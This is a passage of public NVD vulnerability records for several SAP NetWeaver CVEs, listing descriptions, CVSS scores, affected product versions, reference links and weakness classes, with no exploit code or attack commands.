"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-12-13T20:08:40.797",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/56061"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/64232"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-13-022-sap-netweaver-rsddcver_count_tab_cols-potential-sql-injection/"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89603"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1836718"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/56061"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/64232"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-13-022-sap-netweaver-rsddcver_count_tab_cols-potential-sql-injection/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89603"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1836718"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-02-14 15:55
Modified
2024-11-21 02:05
Severity ?
Summary
Unspecified vulnerability in the Portal WebDynPro in SAP NetWeaver allows remote attackers to obtain sensitive path information via unknown attack vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the Portal WebDynPro in SAP NetWeaver allows remote attackers to obtain sensitive path information via unknown attack vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad no especificada en Portal WebDynPro en SAP NetWeaver permite a atacantes remotos obtener informaci\u00f3n sensible de rutas a trav\u00e9s de vectores de ataque desconocidos."
}
],
"id": "CVE-2014-1961",
"lastModified": "2024-11-21T02:05:21.497",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": true,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-02-14T15:55:07.470",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/56947"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91096"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1852146"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/56947"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91096"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1852146"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-03-09 15:15
Modified
2024-11-21 05:48
Severity ?
Summary
The MigrationService, which is part of SAP NetWeaver versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not perform an authorization check. This might allow an unauthorized attacker to access configuration objects, including such that grant administrative privileges. This could result in complete compromise of system confidentiality, integrity, and availability.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/3022422 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=571343107 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/3022422 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=571343107 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EDFFDB95-B956-4B22-81F4-A4074D49D4A8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.11:*:*:*:*:*:*:*",
"matchCriteriaId": "21A3F6A8-B060-48CE-841F-698F8F779191",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"matchCriteriaId": "53B11A3B-C559-428C-8946-7FD9FFBFA1BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The MigrationService, which is part of SAP NetWeaver versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not perform an authorization check. This might allow an unauthorized attacker to access configuration objects, including such that grant administrative privileges. This could result in complete compromise of system confidentiality, integrity, and availability."
},
{
"lang": "es",
"value": "MigrationService, que forma parte de SAP NetWeaver versiones 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, no lleva a cabo una comprobaci\u00f3n de autorizaci\u00f3n.\u0026#xa0;Esto podr\u00eda permitir a un atacante no autorizado acceder a los objetos de configuraci\u00f3n, incluyendo los que otorgan privilegios administrativos.\u0026#xa0;Esto podr\u00eda resultar en un compromiso total de la confidencialidad, integridad y disponibilidad del sistema"
}
],
"id": "CVE-2021-21481",
"lastModified": "2024-11-21T05:48:27.593",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 6.0,
"source": "cna@sap.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-03-09T15:15:14.787",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/3022422"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=571343107"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/3022422"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=571343107"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2008-04-16 17:05
Modified
2024-11-21 00:45
Severity ?
Summary
The default configuration of SAP NetWeaver before 7.0 SP15 does not enable the "Always Use Secure HTML Editor" (aka Editor Security or Secure Editing) parameter, which allows remote attackers to conduct cross-site scripting (XSS) attacks by entering feedback for a file.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:sp8:*:*:*:*:*:*",
"matchCriteriaId": "1AF8B0B5-CE15-43B7-A8EB-0813A7CA5AF4",
"versionEndIncluding": "7.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The default configuration of SAP NetWeaver before 7.0 SP15 does not enable the \"Always Use Secure HTML Editor\" (aka Editor Security or Secure Editing) parameter, which allows remote attackers to conduct cross-site scripting (XSS) attacks by entering feedback for a file."
},
{
"lang": "es",
"value": "La configuraci\u00f3n por defecto de AP NetWeaver versiones anteriores a 7.0 SP15 no permite el par\u00e1metro \"Always Use Secure HTML Editor\" (tambi\u00e9n conocido como Editor Security or Secure Editing), lo cual permite a atacantes remotos llevar a cabo un ataque de secuencias de comandos en sitios cruzados (XSS) introduciendo feedback para un archivo."
}
],
"id": "CVE-2008-1846",
"lastModified": "2024-11-21T00:45:29.393",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2008-04-16T17:05:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://securityreason.com/securityalert/3812"
},
{
"source": "cve@mitre.org",
"url": "http://www.aitsec.com/vulnerability-SAP-Netweaver-6.40-7.0-Cross-Site-Scripting.php"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/490625/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/28699"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1019822"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41735"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securityreason.com/securityalert/3812"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.aitsec.com/vulnerability-SAP-Netweaver-6.40-7.0-Cross-Site-Scripting.php"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/490625/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/28699"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1019822"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41735"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2022-06-13 17:15
Modified
2024-11-21 06:56
Severity ?
Summary
Some part of SAP NetWeaver (EP Web Page Composer) does not sufficiently validate an XML document accepted from an untrusted source, which allows an adversary to exploit unprotected XML parking at endpoints, and a possibility to conduct SSRF attacks that could compromise system�s Availability by causing system to crash.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/3148377 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/3148377 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"matchCriteriaId": "53B11A3B-C559-428C-8946-7FD9FFBFA1BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Some part of SAP NetWeaver (EP Web Page Composer) does not sufficiently validate an XML document accepted from an untrusted source, which allows an adversary to exploit unprotected XML parking at endpoints, and a possibility to conduct SSRF attacks that could compromise system\ufffds Availability by causing system to crash."
},
{
"lang": "es",
"value": "Alguna parte de SAP NetWeaver (EP Web Page Composer) no valida suficientemente un documento XML aceptado desde una fuente no fiable, lo que permite a un adversario explotar el estacionamiento XML desprotegido en los puntos finales, y una posibilidad de llevar a cabo ataques SSRF que podr\u00edan comprometer la disponibilidad del sistema provocando su ca\u00edda"
}
],
"id": "CVE-2022-28217",
"lastModified": "2024-11-21T06:56:58.137",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-06-13T17:15:10.017",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/3148377"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/3148377"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "cna@sap.com",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "nvd@nist.gov",
"type": "Secondary"
}
]
}
Vulnerability from fkie_nvd
Published
2022-04-12 17:15
Modified
2024-11-21 06:57
Severity ?
Summary
Due to an uncontrolled recursion in SAP Web Dispatcher and SAP Internet Communication Manager, the application may crash, leading to denial of service, but can be restarted automatically.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/3111293 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/3111293 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | netweaver | 7.22ext | |
| sap | netweaver | 7.49 | |
| sap | netweaver | 7.53 | |
| sap | netweaver | 7.77 | |
| sap | netweaver | 7.81 | |
| sap | netweaver | 7.85 | |
| sap | netweaver | 7.86 | |
| sap | netweaver | kernel_7.22 | |
| sap | netweaver | krnl64nuc_7.22 | |
| sap | netweaver | krnl64uc_7.22 | |
| sap | web_dispatcher | 7.53 | |
| sap | web_dispatcher | 7.77 | |
| sap | web_dispatcher | 7.81 | |
| sap | web_dispatcher | 7.85 | |
| sap | web_dispatcher | 7.86 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.22ext:*:*:*:*:*:*:*",
"matchCriteriaId": "71AFBCEC-649C-4389-85C2-6C245290E91A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.49:*:*:*:*:*:*:*",
"matchCriteriaId": "E7245DC9-CB62-477A-86B3-41CBBB878F3B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "77CA44BC-8650-4A20-A359-0FE568E1B345",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.77:*:*:*:*:*:*:*",
"matchCriteriaId": "95D831B3-1B5B-441F-8429-B6EC7161A7B5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.81:*:*:*:*:*:*:*",
"matchCriteriaId": "6D232796-B486-4C58-AD93-46D5948F1586",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.85:*:*:*:*:*:*:*",
"matchCriteriaId": "93AA0006-CEEC-4037-B1FC-3C4A7E0D1905",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.86:*:*:*:*:*:*:*",
"matchCriteriaId": "C269F298-5AB8-4AA1-911A-403F5EA62DEE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:kernel_7.22:*:*:*:*:*:*:*",
"matchCriteriaId": "87AABA4D-7683-47B4-BAF7-22AA42E074D4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:krnl64nuc_7.22:*:*:*:*:*:*:*",
"matchCriteriaId": "2D28A3C2-D601-405F-A17C-6A6EBE43DF31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:krnl64uc_7.22:*:*:*:*:*:*:*",
"matchCriteriaId": "AA038239-63B2-4C31-8E74-EE053548621D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:web_dispatcher:7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "47D4D542-2EC2-490B-B4E9-3E7BB8D59B77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:web_dispatcher:7.77:*:*:*:*:*:*:*",
"matchCriteriaId": "E33D9481-3CF6-4AA3-B115-7903AC6DAE25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:web_dispatcher:7.81:*:*:*:*:*:*:*",
"matchCriteriaId": "49FF2A5B-E5F0-4991-9AA3-7CB3B8C62941",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:web_dispatcher:7.85:*:*:*:*:*:*:*",
"matchCriteriaId": "F74EE4D5-E968-4851-89E6-4152F64930F2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:web_dispatcher:7.86:*:*:*:*:*:*:*",
"matchCriteriaId": "327A87AD-6635-4511-8505-F4418CD9D49C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Due to an uncontrolled recursion in SAP Web Dispatcher and SAP Internet Communication Manager, the application may crash, leading to denial of service, but can be restarted automatically.\n\n"
},
{
"lang": "es",
"value": "Debido a una recursi\u00f3n no controlada en SAP Web Dispatcher y SAP Internet Communication Manager, la aplicaci\u00f3n puede bloquearse, conllevando a una denegaci\u00f3n de servicio, pero puede reiniciarse autom\u00e1ticamente"
}
],
"id": "CVE-2022-28773",
"lastModified": "2024-11-21T06:57:54.317",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-04-12T17:15:10.883",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/3111293"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/3111293"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-674"
}
],
"source": "cna@sap.com",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-674"
}
],
"source": "nvd@nist.gov",
"type": "Secondary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-11-04 15:55
Modified
2024-11-21 02:19
Severity ?
Summary
SAPCRYPTOLIB before 5.555.38, SAPSECULIB, and CommonCryptoLib before 8.4.30, as used in SAP NetWeaver AS for ABAP and SAP HANA, allows remote attackers to spoof Digital Signature Algorithm (DSA) signatures via unspecified vectors.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | commoncryptolib | * | |
| sap | sapcryptolib | * | |
| sap | sapseculib | - | |
| sap | hana | - | |
| sap | netweaver | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:commoncryptolib:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C77FFE57-674C-4214-903E-7486310AC087",
"versionEndIncluding": "8.4.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:sapcryptolib:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1950C115-4304-4A2A-86CD-EC17DACFC313",
"versionEndIncluding": "5.555.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:sapseculib:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E77383EF-3BC3-4CB6-852B-4391310EDAE7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:hana:-:*:*:*:*:*:*:*",
"matchCriteriaId": "64E722FC-5FEF-4EE2-9A88-5CD4938283F1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5007E3B7-3C36-4256-9E01-51C6F52FD0FF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAPCRYPTOLIB before 5.555.38, SAPSECULIB, and CommonCryptoLib before 8.4.30, as used in SAP NetWeaver AS for ABAP and SAP HANA, allows remote attackers to spoof Digital Signature Algorithm (DSA) signatures via unspecified vectors."
},
{
"lang": "es",
"value": "SAPCRYPTOLIB anterior a 5.555.38, SAPSECULIB, y CommonCryptoLib anterior a 8.4.30, utilizados en SAP NetWeaver AS para ABAP y SAP HANA, permiten a atacantes remotos falsificar firmas Digital Signature Algorithm (DSA) a trav\u00e9s de vectores no especificados."
}
],
"id": "CVE-2014-8587",
"lastModified": "2024-11-21T02:19:23.250",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
